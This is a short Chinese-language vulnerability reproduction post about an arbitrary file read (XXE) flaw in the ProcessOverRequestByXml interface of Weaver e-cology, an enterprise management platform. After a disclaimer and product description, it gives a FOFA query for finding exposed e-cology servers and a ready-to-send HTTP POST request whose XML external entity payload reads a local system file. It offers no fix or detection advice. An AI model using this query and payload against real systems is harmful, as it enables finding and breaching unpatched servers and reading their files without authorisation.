声明:
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
简介
e-cology是一款全能的企业管理平台,它提供了多种功能,包括企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理和数据中心等。泛微E-Cology采用了先进的安全技术和机制,保障企业数据的安全性和可靠性,包括数据加密、权限控制、备份恢复等。这个平台可以协助企业整合不同领域的资源,如市场、销售、研发等,使得用户可以在一个中心化平台上集成所有资源,并通过统一的界面轻松地操作和获取信息。
泛微e-cology ProcessOverRequestByXml接口存在任意文件读取漏洞。
资产搜索
fofa
(body="/js/ecology8" || body="wui/common/css/w7OVFont_wev8.css" || (body="weaver" && body="ecology") || (header="ecology_JSessionId" && body="login/Login.jsp") || body="/wui/index.html" || body="jquery_wev8" && body="/login/Login.jsp?logintype=1")
漏洞复现
POST /rest/ofs/ProcessOverRequestByXml HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host:
Content-Type: application/xml
Content-Length: 146
<?xml version="1.0" encoding="utf-8" ?><!DOCTYPE test[<!ENTITY test SYSTEM "file:///c:/windows/win.ini">]><reset><syscode>&test;</syscode></reset>